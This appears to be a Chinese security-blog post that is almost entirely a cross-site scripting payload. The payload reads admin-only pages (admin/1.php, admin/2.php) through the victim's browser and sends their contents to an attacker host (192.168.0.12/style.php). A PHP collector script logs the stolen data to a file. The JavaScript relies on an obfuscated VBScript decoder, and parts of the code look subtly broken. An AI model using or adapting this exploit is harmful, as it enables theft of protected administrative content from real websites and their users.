xss后台目录文件内容读取(只适用IE)

vbs小铺
js:
execScript(unescape(Function%20bytes2BSTR%28vIn%29%0D%0A%20%20%20%20%20strReturn%20%3D%20%22%22%0D%0A%20%20%20%20%20For%20i%20%3D%201%20To%20LenB%28vIn%29%0D%0A%20%20%20%20%20%20%20%20%20ThisCharCode%20%3D%20AscB%28MidB%28vIn%2Ci%2C1%29%29%0D%0A%20%20%20%20%20%20%20%20%20If%20ThisCharCode%20%3C%20%26H80%20Then%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20Chr%28ThisCharCode%29%0D%0A%20%20%20%20%20%20%20%20%20Else%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20NextCharCode%20%3D%20AscB%28MidB%28vIn%2Ci+1%2C1%29%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20Chr%28CLng%28ThisCharCode%29%20*%20%26H100%20+%20CInt%28NextCharCode%29%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20i%20%3D%20i%20+%201%0D%0A%20%20%20%20%20%20%20%20%20End%20If%0D%0A%20%20%20%20%20Next%0D%0A%20%20%20%20%20bytes2BSTR%20%3D%20strReturn%0D%0AEnd%20Function),VBScript);
function getReaded(usr) {
var filex="http://192.168.0.12/style.php?key="+mycars[n]+"
"+"
"+usr+"
"+"
";
addFile(filex,-1);
}
function addFile(str,i){
var x=document.createElement(SCRIPT);
x.src=str;
document.insertBefore(x,document.getElementsByTagName(*)[0]);
}
xmlUrl=GetxmlUrlObject()
if (xmlUrl==null)
    {
    alert ("您的浏览器不支持AJAX！");
    }

function GetxmlUrlObject()
{
var xmlUrl=null;
try
    {
    // Firefox, Opera 8.0+, Safari
    xmlUrl=new xmlUrlRequest();
    }
catch (e)
    {
    // Internet Explorer
    try
      {
      xmlUrl=new ActiveXObject("Msxml2.XMLHTTP");
      }
    catch (e)
      {
      xmlUrl=new ActiveXObject("Microsoft.XMLHTTP");
      }
    }
return xmlUrl;
}

var mycars = new Array();
mycars[0] = "admin/1.php";
mycars[1] = "admin/2.php";;
var b = new Array();
for (n=0;n<mycars.length ;n++ )
{
xmlUrl.Open(GET,mycars[n],false);
xmlUrl.setRequestHeader("Content-type","application/x-www-form-urlencoded;");
xmlUrl.Send(null);
if (xmlUrl.readyState == 4){
      if (xmlUrl.status == 200){
b[n]=bytes2BSTR(xmlUrl.responseBody);
//alert(b[n]);
getReaded(b[n]);
}
}

} 
 
php:
<?php 
header(Content-Type:text/html;charset=GB2312);
function   unescape($str)   {     
                    $str   =   rawurldecode($str);     
                    preg_match_all("/%u.{4}|&#x.{4};|&#d+;|.+/U",$str,$r);     
                    $ar   =   $r[0];     
                    foreach($ar   as   $k=>$v)   {     
                                      if(substr($v,0,2)   ==   "%u")     
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));     
                                      elseif(substr($v,0,3)   ==   "&#x")     
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));     
                                      elseif(substr($v,0,2)   ==   "&#")   {     
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));     
                                      }     
                    }     
                    return   join("",$ar);     
}
$file="news.html";
$_GET[key]=unescape($_GET[key]);
fputs(fopen($file,a+),$_GET[key]);
?>

补充：综合编程 , 安全编程 ,

上一个：shell编程Bash中对变量的操作方法谈
下一个：Java设计模式与安全